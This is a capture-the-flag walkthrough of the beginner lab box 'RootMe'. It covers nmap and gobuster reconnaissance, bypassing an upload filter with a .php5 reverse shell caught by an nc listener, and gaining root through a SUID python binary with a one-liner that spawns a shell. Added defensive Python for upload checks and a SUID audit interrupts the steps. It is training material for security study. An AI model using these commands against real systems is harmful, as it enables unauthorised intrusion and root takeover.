
RootMe


Last updated 2 years ago

A CTF for beginners, can you root me?

1. Reconnaissance

1.1 Nmap

Using nmap to scan for open ports and services

nmap -Pn -sC -sV -oA nmap.initial 10.10.40.110

Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-28 19:14 IST
Stats: 0:00:01 elapsed; 0 hosts completed (0 up), 0 undergoing Script Pre-Scan
NSE Timing: About 0.00% done
Nmap scan report for 10.10.40.110
Host is up (2.8s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 4a:b9:16:08:84:c2:54:48:ba:5c:fd:3f:22:5f:22:14 (RSA)
|   256 a9:a6:86:e8:ec:96:c3:f0:03:cd:16:d5:49:73:d0:82 (ECDSA)
|_  256 22:f6:b5:a6:54:d9:78:7c:26:03:5a:95:f3:f9:df:cd (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-title: HackIT - Home
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 206.54 seconds
  • We find two open ports, 22 and 80, running SSH and a web server respectively

2. Scanning

2.1 Gobuster

Using gobuster to brute-force directories in the web server.

sudo gobuster dir -u http://10.10.40.110 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-small-directories.txt

===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.40.110
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-small-directories.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/03/28 19:15:27 Starting gobuster in directory enumeration mode
===============================================================
/js                   (Status: 301) [Size: 309] [--> http://10.10.40.110/js/]
/css                  (Status: 301) [Size: 310] [--> http://10.10.40.110/css/]
/uploads              (Status: 301) [Size: 314] [--> http://10.10.40.110/uploads/]
/panel                (Status: 301) [Size: 312] [--> http://10.10.40.110/panel/]
/server-status        (Status: 403) [Size: 277]
  • We find two interesting directories: /panel and /uploads

/panel

  • We find a page to upload files

/uploads

  • We can see and access the uploaded files here

3. Gaining Access

3.1 Reverse shell

Using the PHP reverse shell from pentestmonkey (https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php)

  • We find that uploading any .php file gives us an error

  • Changing the extension of the script from .php to .php5 bypasses the upload filter

  • Starting an nc listener on our attacking machine and triggering the reverse shell by browsing to /uploads and selecting our uploaded .php5 file

nc -lvnp 9001 

listening on [any] 9001 ...
connect to [10.11.66.165] from (UNKNOWN) [10.10.150.128] 45406
  • Stabilizing the shell and reading the user.txt file

$ python -c 'import pty;pty.spawn("/bin/bash")'

bash-4.4$ find / -type f -name user.txt 2>/dev/null
/var/www/user.txt

bash-4.4$ cat /var/www/user.txt 
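Added example, not part of the writeup: the .php5 trick worked because the panel refused only the literal .php extension. The Python below puts that weak denylist (modelled on the behaviour observed above, an assumption about the panel's code) beside an allowlist check that also requires a single extension and matching image magic bytes; the file names and contents are constructed.

```python
import re

# Constructed sample uploads: (file name, first bytes of the file).
# Only the .php5 case reflects the writeup; the contents are made up.
SAMPLE_UPLOADS = [
    ("photo.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 8),
    ("shell.php", b"<?php echo 1; ?>"),
    ("shell.php5", b"<?php echo 1; ?>"),
]

def weak_check(filename: str) -> bool:
    """Denylist as the panel appears to behave: only a '.php' suffix is refused."""
    return not filename.endswith(".php")

# Allowlist of image extensions and the leading bytes each one must start with.
ALLOWED_EXT = {"png", "jpg", "jpeg", "gif"}
MAGIC = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
}

def hardened_check(filename: str, head: bytes) -> bool:
    """Allowlist + exactly one extension + magic bytes; extension compared case-insensitively."""
    parts = filename.lower().split(".")
    if len(parts) != 2 or not re.fullmatch(r"[a-z0-9_-]+", parts[0]):
        return False          # no double extensions, no odd characters in the stem
    ext = parts[1]
    if ext not in ALLOWED_EXT:
        return False          # .php5, .php or anything else not explicitly allowed
    if not any(head.startswith(sig) for sig in MAGIC[ext]):
        return False          # extension says image, bytes say otherwise
    if b"<?" in head:
        return False          # PHP open tag hidden behind a valid image header
    return True

def audit(uploads=SAMPLE_UPLOADS) -> dict:
    """Return {name: (weak decision, hardened decision)} for each sample upload."""
    return {name: (weak_check(name), hardened_check(name, head)) for name, head in uploads}
```

Even with this check in place, the directory that serves /uploads should be configured so the web server never executes scripts stored there.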

4. Privilege Escalation

4.1 SUID

  • Searching for binaries with the SUID bit set

bash-4.4$ find / -type f -perm -04000 -ls 2>/dev/null

=====================================================================
2019 /usr/bin/newuidmap
   787288     40 -rwsr-xr-x   1 root     root          37136 Mar 22  2019 /usr/bin/newgidmap
   787086     44 -rwsr-xr-x   1 root     root          44528 Mar 22  2019 /usr/bin/chsh
   266770   3580 -rwsr-sr-x   1 root     root        3665768 Aug  4  2020 /usr/bin/python
   787033     52 -rwsr-sr-x   1 daemon   daemon        51464 Feb 20  2018 /usr/bin/at
   787084     76 -rwsr-xr-x   1 root     root          76496 Mar 22  2019 /usr/bin/chfn
   787179     76 -rwsr-xr-x   1 root     root          75824 Mar 22  2019 /usr/bin/gpasswd
   787431    148 -rwsr-xr-x   1 root     root         149080 Jan 31  2020 /usr/bin/sudo
   787289     40 -rwsr-xr-x   1 root     root          40344 Mar 22  
   
=======================================================================
  • We find that /usr/bin/python has SUID bit set.

  • Using the one-liner from GTFOBins, we get root

python -c 'import os; os.execl("/bin/sh", "sh", "-p")'

whoami
root
  • Reading root.txt

cd /root
cat root.txt
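Added example, not part of the writeup: a defender's audit of `find / -perm -04000 -ls` output that flags what made this box rootable, a root-owned SUID interpreter, plus anything outside an expected baseline. The sample lines are taken from the writeup's output; the baseline set and the interpreter pattern are assumptions for the example.

```python
import re

# Constructed sample in `find / -perm -04000 -ls` format; the /usr/bin/python line
# is the writeup's finding, the others are ordinary SUID binaries from the same listing.
FIND_LS_OUTPUT = """\
   787086     44 -rwsr-xr-x   1 root     root          44528 Mar 22  2019 /usr/bin/chsh
   266770   3580 -rwsr-sr-x   1 root     root        3665768 Aug  4  2020 /usr/bin/python
   787033     52 -rwsr-sr-x   1 daemon   daemon        51464 Feb 20  2018 /usr/bin/at
   787431    148 -rwsr-xr-x   1 root     root         149080 Jan 31  2020 /usr/bin/sudo
"""

# Assumed baseline of SUID binaries expected on a stock install (partial, illustrative).
EXPECTED_SUID = {"/usr/bin/chsh", "/usr/bin/chfn", "/usr/bin/gpasswd", "/usr/bin/sudo",
                 "/usr/bin/passwd", "/usr/bin/newgidmap", "/usr/bin/newuidmap", "/usr/bin/at"}

# Interpreters and shells: a SUID bit on any of these hands every local user a root shell.
INTERPRETER_RE = re.compile(r"^(python[\d.]*|perl[\d.]*|ruby[\d.]*|bash|sh|dash)$")

# One `-ls` line: inode, blocks, mode, links, owner, group, size, month, day, year/time, path.
LS_LINE = re.compile(
    r"^\s*\d+\s+\d+\s+(?P<mode>[-rwxsStT]{10})\s+\d+\s+(?P<owner>\S+)\s+(?P<group>\S+)"
    r"\s+\d+\s+\S+\s+\S+\s+\S+\s+(?P<path>/\S+)$"
)

def audit_suid(output: str = FIND_LS_OUTPUT) -> list:
    """Return one finding per suspicious SUID binary, with the reasons it was flagged."""
    findings = []
    for line in output.splitlines():
        m = LS_LINE.match(line)
        if not m:
            continue                      # separators, truncated lines, blanks
        mode, owner, path = m["mode"], m["owner"], m["path"]
        setuid = mode[3] in "sS"          # owner execute slot
        setgid = mode[6] in "sS"          # group execute slot
        base = path.rsplit("/", 1)[-1]
        reasons = []
        if owner == "root" and setuid and INTERPRETER_RE.match(base):
            reasons.append("root-owned SUID interpreter")
        if path not in EXPECTED_SUID:
            reasons.append("not in SUID baseline")
        if reasons:
            findings.append({"path": path, "owner": owner, "setuid": setuid,
                             "setgid": setgid, "reasons": reasons})
    return findings
```

On the box itself the fix is to drop the bits (`chmod u-s,g-s /usr/bin/python`); an interpreter never needs them.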